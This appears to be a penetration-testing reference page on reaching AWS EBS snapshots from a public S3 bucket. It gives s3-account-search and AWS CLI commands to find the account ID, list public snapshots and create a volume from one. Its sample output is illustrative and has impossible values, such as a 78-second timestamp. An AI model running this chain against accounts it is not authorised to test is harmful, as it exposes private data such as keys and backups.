Skip to main content

Public S3 Bucket Leads to Discovery of Public EBS Snapshots

  1. Use s3-account-search to Identify the AWS Account ID

    • The attacker uses the s3-account-search tool to extract the AWS Account ID associated with a public S3 bucket: 
      s3-account-search arn:aws:iam::[attackerAccountId]:role/[attackerCreatedRole] [bucketName]
    • Output: The tool reveals the AWS Account ID: 
      Account ID: 123456789012

  2. Search for Public EBS Snapshots

    • With the discovered Account ID, the attacker queries for public Elastic Block Store (EBS) snapshots: 
      aws ec2 describe-snapshots --owner-ids 123456789012 --query "Snapshots[*].[SnapshotId, VolumeId, StartTime]" --output table
    • Output: The attacker identifies several public snapshots: 
      ------------------------------------------
      |       DescribeSnapshots Output        |
      ------------------------------------------
      | SnapshotId  | VolumeId   | StartTime  |
      ------------------------------------------
      | snap-01234abcd5678efgh   | vol-0123456789abcdef | 2024-12-10T12:34:56Z |
      | snap-09876zyxwv5432qrs   | vol-0987654321fedcba | 2024-12-11T14:56:78Z |
      ------------------------------------------

  3. Analyze and Exploit the EBS Snapshots

    • The attacker can now copy or mount these snapshots for further analysis, potentially accessing sensitive data such as configuration files, database backups, or private keys.

    • Example: The attacker creates a volume from a snapshot:

      aws ec2 create-volume --snapshot-id snap-01234abcd5678efgh --availability-zone us-east-1a

    • Result: The attacker gains unauthorized access to sensitive information stored in the EBS snapshots.